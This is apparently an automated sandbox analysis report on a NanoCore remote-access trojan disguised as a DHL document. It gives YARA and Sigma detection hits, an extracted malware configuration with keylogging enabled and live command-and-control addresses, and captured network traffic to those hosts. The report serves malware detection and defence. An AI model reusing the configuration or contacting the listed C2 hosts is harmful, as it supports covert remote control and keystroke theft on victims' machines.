29.2.CasPol.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
17.2.svchost.exe.4341dc8.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4341dc8.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
17.2.svchost.exe.4341dc8.4.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4341dc8.4.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
29.2.CasPol.exe.5370000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
29.2.CasPol.exe.5370000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
29.2.CasPol.exe.5ae4629.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xb184:$x1: NanoCore.ClientPluginHost 0xb1b1:$x2: IClientNetworkHost
29.2.CasPol.exe.5ae4629.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xb184:$x2: NanoCore.ClientPluginHost 0xc25f:$s4: PipeCreated 0xb19e:$s5: IClientLoggingHost
29.2.CasPol.exe.5ae4629.10.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4341dc8.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.svchost.exe.4341dc8.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x42b25:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x42dad:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x443e6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x443da:$s2: FileCommand 0x1266b:$s3: PipeExists 0x4528b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x4b042:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost 0x42dd7:$s5: IClientLoggingHost
17.2.svchost.exe.4341dc8.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.svchost.exe.4341dc8.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
28.2.svchost.exe.4806e98.6.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
28.2.svchost.exe.4806e98.6.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
28.2.svchost.exe.4806e98.6.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
29.2.CasPol.exe.5ae0000.9.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
29.2.CasPol.exe.5ae0000.9.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
29.2.CasPol.exe.5ae0000.9.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.DHL_document1102202068090891.exe.48057c0.7.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe38d:$x1: NanoCore.ClientPluginHost 0xe3ca:$x2: IClientNetworkHost 0x11efd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.DHL_document1102202068090891.exe.48057c0.7.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe105:$x1: NanoCore Client.exe 0xe38d:$x2: NanoCore.ClientPluginHost 0xf9c6:$s1: PluginCommand 0xf9ba:$s2: FileCommand 0x1086b:$s3: PipeExists 0x16622:$s4: PipeCreated 0xe3b7:$s5: IClientLoggingHost
0.2.DHL_document1102202068090891.exe.48057c0.7.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.DHL_document1102202068090891.exe.48057c0.7.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xe0f5:$a: NanoCore 0xe105:$a: NanoCore 0xe339:$a: NanoCore 0xe34d:$a: NanoCore 0xe38d:$a: NanoCore 0xe154:$b: ClientPlugin 0xe356:$b: ClientPlugin 0xe396:$b: ClientPlugin 0xe27b:$c: ProjectData 0xec82:$d: DESCrypto 0x1664e:$e: KeepAlive 0x1463c:$g: LogClientMessage 0x10837:$i: get_Connected 0xefb8:$j: #=q 0xefe8:$j: #=q 0xf004:$j: #=q 0xf034:$j: #=q 0xf050:$j: #=q 0xf06c:$j: #=q 0xf09c:$j: #=q 0xf0b8:$j: #=q
0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42fad:$x1: NanoCore.ClientPluginHost 0x75bcd:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42fea:$x2: IClientNetworkHost 0x75c0a:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x46b1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x7973d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42d15:$a: NanoCore 0x42d25:$a: NanoCore 0x42f59:$a: NanoCore 0x42f6d:$a: NanoCore 0x42fad:$a: NanoCore 0x75935:$a: NanoCore 0x75945:$a: NanoCore 0x75b79:$a: NanoCore 0x75b8d:$a: NanoCore 0x75bcd:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42d74:$b: ClientPlugin 0x42f76:$b: ClientPlugin 0x42fb6:$b: ClientPlugin
0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x42dad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x42dea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x4691d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x42b15:$a: NanoCore 0x42b25:$a: NanoCore 0x42d59:$a: NanoCore 0x42d6d:$a: NanoCore 0x42dad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x42b74:$b: ClientPlugin 0x42d76:$b: ClientPlugin 0x42db6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x42c9b:$c: ProjectData 0x10a82:$d: DESCrypto 0x436a2:$d: DESCrypto 0x1844e:$e: KeepAlive
Click to see the 53 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 2900, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Sigma detected: Suspicious Svchost Process

Show sources

Source: Process started

Author: Florian Roth: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560

Sigma detected: System File Execution Location Anomaly

Show sources

Source: Process started

Author: Florian Roth, Patrick Bareiss: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560

Sigma detected: Windows Processes Suspicious Parent Directory

Show sources

Source: Process started

Author: vburov: Data: Command: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, NewProcessName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, OriginalFileName: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe, ParentCommandLine: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding, ParentImage: C:\Windows\explorer.exe, ParentProcessId: 6444, ProcessCommandLine: 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' , ProcessId: 6560

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "933bebd4-0378-4b22-a9fe-1200446be5", "Group": "", "Domain1": "185.157.160.229", "Domain2": "noancore.linkpc.net", "Port": 6700, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Disable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Disable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 29980, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe

ReversingLabs: Detection: 32%

Multi AV Scanner detection for submitted file

Show sources

Source: DHL_document1102202068090891.exe	Virustotal: Detection: 28%			Perma Link
Source: DHL_document1102202068090891.exe	ReversingLabs: Detection: 32%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.544960546.00000000047D2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 6560, type: MEMORY
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddb15e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3ddff94.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.3de45bd.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae4629.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.svchost.exe.4341dc8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.svchost.exe.4806e98.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 29.2.CasPol.exe.5ae0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.47d29a0.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.DHL_document1102202068090891.exe.48057c0.7.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: DHL_document1102202068090891.exe

Joe Sandbox ML: detected

Source: 29.2.CasPol.exe.5ae0000.9.unpack

Avira: Label: TR/NanoCore.fadte

Compliance:

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: DHL_document1102202068090891.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: .pdb8 source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
Source:	Binary string: DHL_document1102202068090891.PDBp source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.518675957.00000000012BE000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.518266676.00000000015E7000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000011.00000002.518543220.00000000012B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb: source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp
Source:	Binary string: S:AI(RA;IOOICI;;;;WD;("IMAGELOAD",TU,0x0,0x01))\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: IL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518833808.0000000001610000.00000004.00000020.sdmp
Source:	Binary string: 00240000048000009400000006020000002400005253413C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000011.00000002.519520008.00000000012F3000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb1l source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.517829728.00000000015D9000.00000004.00000020.sdmp
Source:	Binary string: kc.pdbis/P} source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB/ source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb/C:/Windows/System32/cmd.exe source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
Source:	Binary string: iVisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbC:\Users\user\Documentsr source: svchost.exe, 00000011.00000002.515773658.0000000001255000.00000004.00000001.sdmp
Source:	Binary string: iVisualBasic.pdbt source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
Source:	Binary string: Windows.Foundation.Collections.ValueSet\??\C:\Windows\symbols\dll\mscorlib.pdb source: svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb} source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: noancore.linkpc.net
Source: Malware configuration extractor	URLs: 185.157.160.229

Source: global traffic

TCP traffic: 192.168.2.5:49732 -> 185.157.160.229:6700

Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com

Source: Joe Sandbox View

IP Address: 104.21.71.230 104.21.71.230

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/F55ACED73ADD255559F0ED65FFDFD3E9.html HTTP/1.1Host: coroloboxorozor.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /base/D9CFC9FB28456A5A139C9F495F1407BB.html HTTP/1.1Host: coroloboxorozor.com
Source: global traffic	HTTP traffic detected: GET /base/40146EDED8BA63D6AE3F2DAF99B02171.html HTTP/1.1Host: coroloboxorozor.com
